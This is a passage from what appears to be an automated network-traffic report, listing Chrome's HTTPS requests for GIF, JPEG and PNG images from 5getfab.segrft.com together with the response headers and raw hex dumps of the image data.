6a 92 18 52 e2 3b c9 78 6e f1 79 0b 96 18 c8 f5 99 23 62 9b 2d 52 c2 17 bf fc 9d 2e 58 f7 99 a7 31 f3 dd 80
                                                      Data Ascii: gQ#X"mi]_^DQB?%{R$i:8%"2HP+)uS,N'IIn]MOH;ZN,oC~qQ>S$@.KX`(esfD"3Rx((i51>g;XGr fr'H!tp*/jR;xny#b-R.X1
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 96 d0 84 42 10 2f ad d0 5b 2c a5 86 21 42 07 05 ed 41 f6 6a 75 ad 6b fb ba 20 d9 69 da c7 52 68 f8 84 af b7 68 b2 4c d4 bd 19 cb a5 48 f3 47 5e d7 4e 62 7e 56 e1 fe 0f 55 15 cf cd fd 31 71 b4 89 37 95 38 8d cd 48 98 dc e9 35 18 c0 08 34 2f c5 5d 71 6d 8b 27 f3 ed c9 d3 fd 07 36 b2 05 83 0e 3d 46 75 c8 2f 17 bb 88 67 8b c9 7c f2 da c1 8d d4 15 07 10 d1 f1 45 18 50 91 b5 b2 50 61 6b d9 a1 6b 34 e0 3e 9d 79 00 f4 11 70 b5 da fd ba ed 7e dd 76 f5 98 7a 1c 3d c5 d0 25 c4 db 6d f5 db d5 3c e4 b1 e9 58 a1 91 e1 81 d5 97 fd 8c 39 c3 0a 67 07 3e 6b e3 d7 6b f6 eb a3 7f 48 9f ae b7 f8 b7 ff 00 c1 3b 7a e8 df 41 05 f7 eb a7 5d bf 47 6b f6 eb 3c 3b be b0 b5 e4 f4 10 7a ed 7e dd 74 05 a0 83 d7 46 fa 08 3f bf 5d 1b 68 20 b4 11 7d 76 37 fe d6 fa ed 7e dd 74 eb a7 d1 89
                                                      Data Ascii: B/[,!BAjuk iRhhLHG^Nb~VU1q78H54/]qm'6=Fu/g|EPPakk4>yp~vz=%m<X9g>kkH;zA]Gk<;z~tF?]h }v7~t
                                                      2025-01-12 23:47:56 UTC4096INData Raw: b3 90 f6 08 f8 d9 d7 80 6a 53 12 4e a8 ed 9b b0 ae 77 90 ef df c8 b1 39 aa 6d 56 24 04 fd aa 05 7f ae b6 de 21 76 0a 99 b5 48 a6 a1 23 d9 15 a1 f2 64 b1 f0 db 87 b7 6a 02 b5 0c 01 68 21 5e 2b 56 ce 3c b1 52 ca 31 f7 7d 3b 56 64 54 22 51 f1 65 a2 05 6d be 6e 38 a3 a9 39 6a 13 ac 69 91 a4 56 e2 27 3f 57 bb 0e ad 17 d7 dc 17 7c e0 e3 91 3b d0 07 a6 e9 6a 06 ca fc 55 36 a5 f2 4d 2f 28 15 87 ed e3 4a c9 ef b5 ad 29 5c a4 a2 2c fa b2 01 46 24 a8 b2 08 43 74 bc 6b f3 f8 30 9e 41 a7 bb d9 16 f8 1f ac 5b 5d f7 08 5a 43 7f 1e 8f 54 cc 2a 92 51 22 82 e7 ed 29 82 06 7c b9 0f 2b 6e c0 cf 6c 41 a8 94 52 14 1b 43 3e c2 11 2e 9f eb 2b d5 54 c2 5c fa 8b 0c 51 17 36 1f 66 eb 08 47 32 b0 3a b3 b7 2c 40 ab c7 3c ab 54 c5 12 f7 e4 c5 e2 2f d9 2e 56 92 fa bd 8c 46 f5 fa 8e 4d
                                                      Data Ascii: jSNw9mV$!vH#djh!^+V<R1};VdT"Qemn89jiV'?W|;jU6M/(J)\,F$Ctk0A[]ZCT*Q")|+nlARC>.+T\Q6fG2:,@<T/.VFM
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 7a 07 19 d6 9b 1b 4c c3 62 44 cd 73 64 46 74 74 bd 77 74 90 6e 5c 25 85 19 cc ca 65 11 cd 7b e8 db bc 9c 0c 12 1c 89 ab bb b4 ae 5e 27 00 32 75 61 7a 9a 08 94 8b 47 8e e1 5f da 65 96 3d 11 ea 38 d5 28 f5 3d a3 57 c2 93 06 4a 89 cf 01 2e c2 db 15 ae c0 bb db f3 e0 23 ee 04 40 d3 55 1c 88 ce db ad f9 0b 6e c5 7f 53 be b3 ba b6 72 45 cd cd 83 69 7b 1c 31 4f 8d 92 d1 5f a4 d5 b2 8b df c7 21 b4 49 eb 62 cf d6 79 88 71 a2 9d 3a 2a 29 d0 f7 1e ba 54 49 11 9c b6 38 ed 1b da c3 22 0b ad 1c 50 2b 32 26 b6 bf 58 50 a0 66 1e 68 35 64 0b 4f c6 56 fb 45 f5 71 2a a5 56 95 fc f3 9a 3f aa 38 7e a8 75 81 fe 3c f1 4e d1 70 69 b3 eb 35 f0 5a a1 41 94 b8 ca 5b 08 6c 2c d9 20 2e 0f 63 1a d1 cf 8b e9 08 82 dd e6 a9 84 24 2e 58 f4 fa a2 10 b4 7c bc 31 26 b7 4e a9 6a da b4 c8 8d
                                                      Data Ascii: zLbDsdFttwtn\%e{^'2uazG_e=8(=WJ.#@UnSrEi{1O_!Ibyq:*)TI8"P+2&XPfh5dOVEq*V?8~u<Npi5ZA[l, .c$.X|1&Nj
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 79 ba 54 a6 5c 47 6c f9 23 97 e8 8e 24 6a 1d a5 07 46 e1 13 22 88 f5 61 f4 59 4a 52 25 ae c2 3d a8 6d b7 b3 d9 22 75 b7 63 9e 03 f7 be ed 20 fe aa 0c b1 19 b6 7d 53 1f b1 1a 89 dc 42 05 32 aa 24 f9 6d 19 9d e9 8d 5a 7c a2 ee 37 f9 30 1c 00 03 90 af cd 6f d8 39 25 f5 f1 52 d3 74 f9 75 7d 49 31 22 f9 8c 11 52 85 31 62 dd da 2a 50 0e 29 df 6b c3 aa 04 bb 67 c1 7e 4d dc 59 32 ee 46 ae b1 20 f0 61 d2 5b 12 78 40 98 28 7f 77 11 11 26 8e f0 e5 c4 ca fb 79 62 bd e8 e6 bc 53 ea b4 ba b1 3f 3a cc 92 8d de 08 c8 04 f6 10 22 51 f8 a9 63 c3 05 cb f6 b1 3f d3 1d 26 f1 f6 48 a2 91 62 45 49 4d 3f a7 2a ec 49 f4 aa 99 a0 1f c9 5a 9a 9f f5 d8 d3 3a fa 91 51 fa 0d 44 c8 b9 fe b0 60 28 73 43 f9 aa 6d 2c 27 d2 4d 18 fe b4 19 c3 81 93 23 fa 53 fb 1f 03 d3 3f d1 f1 30 15 52 94
                                                      Data Ascii: yT\Gl#$jF"aYJR%=m"uc }SB2$mZ|70o9%Rtu}I1"R1b*P)kg~MY2F a[x@(w&ybS?:"Qc?&HbEIM?*IZ:QD`(sCm,'M#S?0R
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 84 df 4c d5 b4 d8 14 e6 dc c5 75 72 63 3b 39 2b ac 7d 8e 1e 3c 1c 16 a9 b3 b4 fd 40 54 11 63 19 83 85 ac b8 b9 0f 23 c4 68 41 28 2a 55 0b da 7c c7 88 96 f3 72 1b b1 25 a9 34 12 12 02 4b 3c c8 f7 06 e5 f5 0f bd f7 af a4 5c aa 1e 89 f5 a5 35 9a fe 8a 03 a7 b5 04 88 71 24 26 65 3d 2e a2 99 a9 b2 07 7c a2 36 f6 ed 6c 3c 0a f2 c6 80 ab 36 85 57 9f aa f5 0c 5a 93 65 d5 23 bd cb 90 d5 b2 3c 28 82 a5 0f 05 6d 12 cc ef 5b 39 f9 2a 96 69 7f 4a 93 83 5e 54 5b 3f 4d 52 49 e5 29 72 a4 53 49 ea 69 54 27 cc 83 0e 34 18 f4 ef 96 dd b3 7b 99 86 2a 5a f7 41 c8 af e9 d7 d5 9b 51 7d 36 79 c1 d7 11 e6 46 ef 4e 6b 0e db a0 a6 e1 13 b2 f5 e2 78 6a 29 53 28 be 92 06 9f 23 53 03 e2 50 65 48 8e d8 eb 77 ad 08 60 e4 a5 ac f0 58 b9 1e de 35 05 12 b3 3b 53 d5 b4 13 a9 48 9f 52 38 55
                                                      Data Ascii: Lurc;9+}<@Tc#hA(*U|r%4K<\5q$&e=.|6l<6WZe#<(m[9*iJ^T[?MRI)rSIiT'4{*ZAQ}6yFNkxj)S(#SPeHw`X5;SHR8U


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      99192.168.2.44985120.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:57 UTC392OUTGET /images_plus/index/en/liveinplay.gif?ver=1683086133 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:57 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:57 GMT
                                                      Content-Type: image/gif
                                                      Content-Length: 620
                                                      Connection: close
                                                      Last-Modified: Wed, 03 May 2023 03:55:33 GMT
                                                      ETag: "6451db35-26c"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:57 UTC620INData Raw: 47 49 46 38 39 61 cc 00 17 00 c4 00 00 ff df 1b 4d a0 80 c4 c8 29 89 c0 aa 4d 98 46 89 b0 38 c4 e0 d5 b6 d8 ca a7 d0 c0 21 88 60 6b b0 95 f1 f8 f5 e2 f0 ea 3f 98 75 30 90 6a 5c a8 8a f1 d9 1e 21 86 51 d3 e8 e0 e2 d3 22 30 8c 4e 7a b8 a0 98 c8 b5 6b a4 3f b6 c2 2d 3f 92 4a 5c 9e 43 7a aa 3c d3 cd 26 a7 bc 31 ff ff ff 12 80 55 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 05 00 00 1f 00 2c 00 00 00 00 cc 00 17 00 00 05 ff e0 27 8e 64 69 9e 68 aa ae 6c eb be 70 2c cf 74 6d df 78 ae ef 7c ef ff c0 a0 70 48 2c 1a 8f c8 56 86 40 11 51 08 04 13 34 92 0a 04 2a 03 45 a0 64 75 a8 1c 5d 52 c2 9a e0 06 1a c9 b4 1a 05 00 08 44 85 76 a1 d4 8e 9e 02 9e bc 9e f1 18 e5 07 2a 07 79 08 24 0a 79 16 24 78 1e 84 6b 8d 6b 6d 6f 1f 71 6d 19 24 75 28 8a 12 06
                                                      Data Ascii: GIF89aM)MF8!`k?u0j\!Q"0Nzk?-?J\Cz<&1U!NETSCAPE2.0!,'dihlp,tmx|pH,V@Q4*Edu]RDv*y$y$xkkmoqm$u(


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      100192.168.2.44985320.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:57 UTC382OUTGET /images_plus/index/g04.jpg?ver=1606793375 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:57 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:57 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 10687
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 03:29:35 GMT
                                                      ETag: "5fc5b89f-29bf"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:57 UTC3739INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 04 03 03 04 03 03 04 04 04 04 05 05 04 05 07 0b 07 07 06 06 07 0e 0a 0a 08 0b 10 0e 11 11 10 0e 10 0f 12 14 1a 16 12 13 18 13 0f 10 16 1f 17 18 1b 1b 1d 1d 1d 11 16 20 22 1f 1c 22 1a 1c 1d 1c ff db 00 43 01 05 05 05 07 06 07 0d 07 07 0d 1c 12 10 12 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c ff c2 00 11 08 00 51 01 0f 03 01 11 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 01 02 04 05 06 07 00 08 ff c4 00 1b 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 01 04 05 03 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f9 3f 1f 61 e0
                                                      Data Ascii: JFIFC ""CQ?a
                                                      2025-01-12 23:47:57 UTC4096INData Raw: 5a 7d 9f e9 b8 96 cf b2 32 ba 09 63 76 dd 08 00 54 f6 5f ac 4a 5d d4 5f df fa 01 51 d1 0a 42 c9 b9 84 43 0e e5 92 f8 93 18 99 6e 2b 84 20 04 54 99 d7 f1 07 ee 3c bc bc 61 f8 f6 62 5a 67 5a 2d 5f 9d e5 1d 04 e6 14 0b 18 4a 36 ff 00 d3 46 f3 fc 34 b4 d8 de 47 7b cc da 5f 66 2e fe 20 0c 51 9f c3 b3 8c c1 95 94 28 e6 e5 68 76 5c 25 7e 55 d4 da e3 97 06 3d 4a f1 e0 6e 5c 83 62 fe ee 5f 20 b8 ca a9 16 e4 d6 a3 5e c5 32 60 12 c0 94 e0 b3 e4 bb 27 c7 5a e0 89 2d b6 ec 2f 26 dd 9b 77 2a 59 fb ba 07 5e aa 1d 8e 59 b1 5d 7c 7a 86 ad c8 3d fd ff 00 c6 e3 79 4a 74 5f bf 01 71 6a 6c f0 56 5c a5 4c 7c 58 5e 65 83 7a f0 53 c7 64 cc 30 f4 7e 06 70 7c fa 9a 51 7e f6 2a 5b 8d ad d3 d7 36 55 b7 ed 9b 2f ca 95 14 ce 7a 86 0d 4e 1b 0c 75 e7 75 29 63 30 eb 4a fc dd fd 46 01 ec
                                                      Data Ascii: Z}2cvT_J]_QBCn+ T<abZgZ-_J6F4G{_f. Q(hv\%~U=Jn\b_ ^2`'Z-/&w*Y^Y]|z=yJt_qjlV\L|X^ezSd0~p|Q~*[6U/zNuu)c0JF
                                                      2025-01-12 23:47:57 UTC2852INData Raw: c1 73 f4 1d 4f db e7 3a 5c 2f 73 ff 00 27 d3 53 4a 56 d3 73 60 66 a8 c2 de 0b b1 6c 80 70 0b 00 34 b1 79 74 03 78 01 94 28 f9 0e ba 72 f1 51 a9 65 54 6c 37 10 4e fa 59 7a cd 42 92 8f 1b 69 d3 76 ff 00 57 76 ba f4 79 a3 fc 54 73 06 ba 06 24 c7 b3 c6 03 48 f6 b4 bc 35 52 8d 58 f0 9a 90 e3 f6 d5 bf e5 6e 9a 7b 15 65 4b ec 00 32 62 42 bf 98 52 18 4e eb a8 56 a2 9e cf 28 2d c1 46 df cb 0c 6a 29 eb 1a f4 5c 87 22 a0 6b 84 9e 52 a7 bb fd 02 d1 e4 4e 96 ea dd 9d ec 75 ea 54 21 01 bc e1 2d 1f b4 e9 1f bf 74 b6 d8 16 82 ca 11 8d d3 24 46 cb 6e 09 d2 7e 2a d6 47 71 1c bd e2 55 01 7e 21 54 12 3a 5d a6 e2 5a 54 ea 11 60 8e 32 98 06 67 17 f8 66 35 0a 0d 36 3e 1b d6 ad aa 73 51 d4 39 42 39 8b 17 5e 25 fe d1 20 b0 fc da d9 1c ad 41 ef 20 62 a1 bf 52 f8 fa 8d 75 a7 20 8b
                                                      Data Ascii: sO:\/s'SJVs`flp4ytx(rQeTl7NYzBivWvyTs$H5RXn{eK2bBRNV(-Fj)\"kRNuT!-t$Fn~*GqU~!T:]ZT`2gf56>sQ9B9^% A bRu


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      101192.168.2.44985220.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:57 UTC382OUTGET /images_plus/index/g02.png?ver=1606793399 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:57 UTC356INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:57 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 15513
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 03:29:59 GMT
                                                      ETag: "5fc5b8b7-3c99"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:57 UTC3740INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 0d 00 00 00 4f 08 03 00 00 00 c6 2b 60 e9 00 00 03 00 50 4c 54 45 62 4f 2e 0d 0f 0b 01 01 01 66 52 30 0a 0c 07 38 38 38 0a 08 08 04 08 03 08 02 01 6a 56 35 3a 3b 35 10 0d 0f 05 08 09 62 4b 2b 6b 55 2e 09 0b 0d 65 4d 2d 38 37 34 3d 3d 3b 57 45 24 0a 09 03 8b 70 40 18 19 16 0b 0e 12 12 0d 06 88 6c 3e 0d 09 0c 99 7a 47 6f 58 30 9d 7d 4a 7c 64 38 52 41 21 94 76 43 14 14 10 1e 1e 17 5c 49 28 8f 73 44 79 60 34 86 6a 3a 66 51 28 10 03 01 82 66 38 73 59 33 81 68 3f 29 2a 26 a3 82 4d 8f 0e 0e a9 87 4f 34 33 33 24 23 25 07 12 09 ae 8c 51 39 35 2a 23 18 09 b5 91 55 54 16 13 9c 0f 11 93 79 4a 41 31 1a 13 0d 14 2c 2e 2e 1f 1c 20 2d 1c 04 28 1d 14 be 12 13 3c 2a 0d 75 5d 30 25 24 1c 34 2b 29 87 1a 1b 31 27 13 38
                                                      Data Ascii: PNGIHDRO+`PLTEbO.fR0888jV5:;5bK+kU.eM-874==;WE$p@l>zGoX0}J|d8RA!vC\I(sDy`4j:fQ(f8sY3h?)*&MO433$#%Q95*#UTyJA1,.. -(<*u]0%$4+)1'8
                                                      2025-01-12 23:47:57 UTC4096INData Raw: 24 e2 44 3d be ff 24 3d 32 15 a1 6a 9e 37 2a b4 e1 c0 81 0d 0d 5e 47 7a ba 4c a2 d7 ff f5 06 78 e0 26 49 4b 17 a4 a2 c9 50 dc 95 c7 4d 88 8a 8b 0a f0 a0 7b 22 42 3c 10 a4 2a 35 ae b5 04 f9 42 83 9a 89 10 ef 29 d5 38 bd f1 58 64 4f 85 e7 f0 0a 70 38 b4 ef 8e d5 3a 7d fa d4 ec 05 46 79 4e fe 00 b9 44 55 fb a4 a9 36 47 3e f7 8c 5f ab 05 89 17 d3 5a 12 1d 1d 97 a7 69 2b 8b d5 be 1d 13 47 1c af 9e b5 76 f4 c0 29 8e fd e6 c9 ab 3e 7d d8 fd e1 e5 87 bd e7 09 86 29 b0 a8 98 b9 74 a9 b3 53 d5 f4 a4 a4 73 8d dd e9 ae 0c 98 0a 0b 4d f8 4f 44 80 a5 e8 c5 9b b1 35 6c 6a 63 32 19 66 83 cd 46 b2 27 7a 29 89 22 b5 67 26 44 66 19 82 12 49 27 6a c0 a0 cf fa f4 97 30 65 19 a8 8e 79 ba be 13 69 62 b6 c7 6c 83 44 93 80 43 4e b2 d0 0d 92 09 c2 91 46 04 4d 96 8a 8b 0b 82 91 c1
                                                      Data Ascii: $D=$=2j7*^GzLx&IKPM{"B<*5B)8XdOp8:}FyNDU6G>_Zi+Gv)>})tSsMOD5ljc2fF'z)"g&DfI'j0eyiblDCNFM
                                                      2025-01-12 23:47:57 UTC4096INData Raw: 55 9e 72 b9 8c 46 a3 2b d0 cd 7c 7f 8a 69 ef bc 7a e1 c2 17 4d e9 d2 15 41 41 41 e1 f1 f1 31 73 12 a6 df 7e db bf 44 72 19 f1 c8 50 5d 4e 6a ea 87 9f 61 38 20 52 57 ca b9 be 14 37 71 05 68 cc f0 10 88 af 5c f9 16 b2 20 16 37 ae 5f bb 7e 83 a5 71 e9 d7 87 df fb d2 84 bb 18 40 03 38 00 80 0e d8 43 ba 09 c8 37 92 47 e2 90 ff a5 0d ac e0 0f 6f fe 1e b5 63 21 c2 d3 79 96 e9 4d 8e 48 8e 5d 6c b1 f3 39 7c 74 15 a8 1f 32 f4 62 ac 2c 80 c2 a3 21 53 4a 56 8a 34 a8 bc 66 70 70 6f 63 a3 35 75 de 8c c5 90 84 4f 34 d2 40 4a 28 22 82 57 24 f4 f4 ac 5e ad ce 62 3a cf 9f 6e 32 46 ec 4f 28 a9 d9 56 1e 18 8d 09 89 54 a4 56 57 ba 10 48 93 b3 48 93 8a 96 6f a0 8c 0b 57 99 36 63 c7 2d 33 17 c4 87 83 c7 ea 84 84 e9 b7 2c 5e fc cd dc d4 42 22 02 63 26 26 7d 83 db cb c3 95 e9 e9
                                                      Data Ascii: UrF+|izMAAA1s~DrP]Nja8 RW7qh\ 7_~q@8C7Goc!yMH]l9|t2b,!SJV4fppoc5uO4@J("W$^b:n2FO(VTVWHHoW6c-3,^B"c&&}
                                                      2025-01-12 23:47:57 UTC3581INData Raw: ec 74 83 b3 bb 57 e3 f2 a4 a4 c8 ea 83 5f 7e 49 c7 57 b9 5b 36 45 fa ac f7 5b 3f 0e a3 80 39 d4 d5 51 bb c2 d6 de 99 75 8c d6 ee 59 8f 79 2a ca 0c 36 49 b7 c2 68 64 be 88 1d d6 c4 a2 a2 5d 37 74 b4 63 94 36 0f 68 bf 19 2d 3c ea f1 73 83 a4 e9 e9 69 53 8e ff f6 70 59 db 8f 86 e0 04 b8 89 42 a1 e6 4f 18 f9 08 b7 0b 73 89 81 02 c3 c5 45 07 37 81 5b 40 80 41 e2 c6 41 39 17 34 9c 07 2b 40 03 e3 53 dc 50 1c 8d db dc 94 1a a2 c1 ac 4c 4d 02 08 c2 41 22 36 96 d4 bb 08 d1 03 3c ec 66 d2 0b ec 03 3c 18 11 ca b8 b7 a2 d2 33 4a 17 95 1a 90 61 7f cc 4b 85 72 ab 17 45 fb f9 7d da c1 3c a3 fd 6c d7 f9 f3 b5 29 29 27 06 52 ce d7 8d 8e 82 c6 54 0b 9d ec 9a bd 84 4e a8 45 0b 17 fa 3c ee 29 0c 7a f6 be 82 b2 96 60 3c 1b fb 84 c5 13 cf 60 3c 4a 42 9a 41 5d 5e e1 6a c0 e9 4e
                                                      Data Ascii: tW_~IW[6E[?9QuYy*6Ihd]7tc6h-<siSpYBOsE7[@AA94+@SPLMA"6<f<3JaKrE}<l))'RTNE<)z`<`<JBA]^jN


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      102192.168.2.44985420.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:57 UTC616OUTGET /images_plus/other/banner7.jpg?ver=1606891701 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:57 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:57 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 38207
                                                      Connection: close
                                                      Last-Modified: Wed, 02 Dec 2020 06:48:21 GMT
                                                      ETag: "5fc738b5-953f"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:57 UTC3739INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c2 00 11 08 00 ff 02 bc 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 02 03 06 07 08 04 05 09 01 0a ff c4 00 1c 01 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 05 04 06 07 02 01 08 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fc ff
                                                      Data Ascii: JFIFCC
                                                      2025-01-12 23:47:57 UTC4096INData Raw: f8 7f 5f 79 fe 73 30 4d ff 00 1e c3 f6 fc de 00 bc f2 f5 fd ea b8 e4 de 6f 6b 9d e6 98 00 02 a1 5c 9a 3e 4c 90 73 e4 c5 e6 20 c9 19 1a ee 5a ce d2 f1 ce 2e cb 7e e5 50 5b 50 da 49 17 09 35 e9 3d 2d 69 3c 5a d8 f6 bc c4 7d 6c 79 3d e4 d8 78 97 0f 6c b4 a2 b7 e0 c7 95 c2 4f c3 c7 9b 8c c8 f8 92 20 15 01 b4 f6 bc cf 98 f3 aa 35 5d 3a 65 44 7f 0a a7 2a 08 7b bc 1a ae ab 3a c7 87 97 94 8e 31 52 48 ee c9 a9 37 ce f7 92 79 c5 ae 77 6d ae b5 e6 9c 07 bd 66 aa e9 00 1f 4f 80 40 1f 4a 60 bb 66 a5 de ab de 4f e7 16 b9 dd f6 f2 d7 99 59 b1 c9 ae 75 5d 32 24 48 94 d2 0a 60 89 10 53 2f 3c bd 7f 7b ae 79 2f 9b 1a df 7a 88 00 00 48 e5 15 5e 2b c9 8f ce 47 da 7c c8 e7 bc 76 5e eb 79 52 56 f3 66 c6 e6 f9 c3 9c b1 cc a7 1f be 37 dc 9e 37 9c be 0e 3d 8f 03 c6 6f 59 f7 df 5b
                                                      Data Ascii: _ys0Mok\>Ls Z.~P[PI5=-i<Z}ly=xlO 5]:eD*{:1RH7ywmfO@J`fOYu]2$H`S/<{y/zH^+G|v^yRVf77=oY[
                                                      2025-01-12 23:47:57 UTC4096INData Raw: 02 24 8c 1f 31 29 52 c1 6b 12 7f 02 5b 45 ca 3e b0 dc 63 68 7a 82 78 12 48 ad b2 62 49 21 f7 0f 33 7d 00 2a 16 d1 ab d1 a5 da a4 f0 e3 99 de dd 3d 34 e9 74 73 39 db bf a6 9d 2e 8e 67 3b 77 f4 d3 a5 d1 cc e7 6e fe 9a 74 ba 39 9c ed df d3 4e 97 47 33 9d bb fa 69 d2 e8 e6 73 b7 7f 4d 3a 5d 1c ce 76 ef e9 a7 4b a3 99 ce dd fd 34 e9 74 73 39 db bf a6 9d 2e 8e 67 8b 77 f4 d3 a5 d1 5b b2 50 7c 37 29 e9 fa 95 45 de 08 0f 94 54 d0 f5 a9 1f 76 b4 96 19 ab 23 23 2c 03 88 22 82 26 98 db 82 24 0e 2a 1d 94 89 00 f1 10 41 31 d3 24 b6 93 94 4d 63 b8 36 c0 d5 1d 63 91 20 b6 8a 8b 24 87 5c 81 64 df 6f 65 3b 89 ab d2 a5 d2 4d 27 87 1c ce 96 e7 e9 a3 4b 63 99 d2 dc fd 34 69 6c 73 3a 5b 9f a6 8d 2d 8e 67 4b 73 f4 d1 a5 b1 cc e9 6e 7e 9a 34 b6 39 9d 2d cf d3 46 96 c7 33 a5 b9
                                                      Data Ascii: $1)Rk[E>chzxHbI!3}*=4ts9.g;wnt9NG3isM:]vK4ts9.gw[P|7)ETv##,"&$*A1$Mc6c $\doe;M'Kc4ils:[-gKsn~49-F3
